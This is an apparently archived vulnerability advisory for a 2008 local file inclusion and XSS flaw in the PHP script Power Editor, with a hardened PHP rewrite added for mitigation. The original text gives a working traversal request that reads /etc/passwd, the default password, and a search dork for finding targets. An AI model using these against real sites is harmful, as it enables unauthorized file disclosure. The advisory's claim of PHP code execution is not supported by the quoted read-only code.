Vendor: Power Editor
By: Virangar Security Team (hadihadi)
CVSS: 8.5 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: Power Editor
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Power Editor LOCAL FILE INCLUSION Vulnerability

A local file inclusion vulnerability exists in Power Editor that allows an attacker to include a file from the local system, which can be exploited to execute arbitrary PHP code. The vulnerability is in the 'editor.php' script and is reached when the 'action' parameter is set to 'tempedit'. The 'm' parameter is base64 encoded and is used to authenticate the user. The 'te' parameter specifies the file to include and the 'dir' parameter specifies the directory; the script joins the two into a single path. Successful exploitation requires that 'register_globals' is set to 'on'.

Mitigation:

Disable 'register_globals' and filter input passed to the 'te' and 'dir' parameters.
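
The mitigation above, applied to the 'tempedit' branch of editor.php that the raw advisory below quotes. This is an added example, not code from Power Editor or from the advisory. TEMPLATE_DIR, read_template() and the 'editor_authenticated' session flag are hypothetical names, and the example assumes templates live in a single fixed directory.

```php
<?php
// Added example: hardened form of the 'tempedit' file read in editor.php.
// TEMPLATE_DIR, read_template() and the session flag are hypothetical names.
declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates'; // assumption: the only directory templates live in

// Return the template contents, or null if the request is not allowed.
function read_template(string $te, string $baseDir = TEMPLATE_DIR): ?string
{
    // Accept a plain file name only: no slashes, no "..", no leading dot, no NUL.
    if (!preg_match('/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*\z/', $te)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $te);
    if ($base === false || $path === false) {
        return null;
    }
    // The canonical path must still sit inside the template directory (catches symlinks).
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0 || !is_file($path)) {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

// Read request values explicitly instead of relying on register_globals.
$action = $_GET['action'] ?? '';
if ($action === 'tempedit') {
    session_start();
    // Assumption: a separate login step set this flag after checking the password,
    // so the password is no longer carried in the URL as 'm'.
    if (empty($_SESSION['editor_authenticated'])) {
        http_response_code(403);
        exit;
    }
    $te = $_GET['te'] ?? '';
    $stuff = is_string($te) ? read_template($te) : null; // 'dir' is no longer client-supplied
    if ($stuff === null) {
        http_response_code(400);
        exit;
    }
    // Encode on output; the advisory also reports XSS through 'te' and 'dir'.
    echo htmlspecialchars($stuff, ENT_QUOTES, 'UTF-8');
}
```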

Exploit-DB raw data:

             ########################################################################
             #                                                                      #
             #    ..:::::Power Editor LOCAL FILE INCLUSION Vulnerability ::::...    #
             ########################################################################

Virangar Security Team

www.virangar.net

--------
Discovered By: Virangar Security Team (hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
download:http://www.scriptsez.net/index.php?action=details&cat=Content%20Management&id=1063623812
dork: Powered By Power Editor
-----------------------------------
vuln code in editor.php:
line 84-94:
if ($action=="tempedit") {
$n=base64_decode($m);    
if ($n==$password){
template();
$te=$HTTP_GET_VARS['te'];
$dir=$HTTP_GET_VARS['dir'];
$filename = "$dir/$te";
$fd = fopen ($filename, "r");
$stuff = fread ($fd, filesize ($filename));
fclose ($fd);
?>
-------
vuln:
http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir]
examp:
editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..

-------------------------------------
and xss here :D :
http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[xss]&dir=[xss]
-----
note:
default pass for login is:changeme
-----
young iranian h4ck3rz
/* tnx 2:
st0rke,aria-security.net,r00tshell.org,all h4ck3rz */

# milw0rm.com [2008-05-05]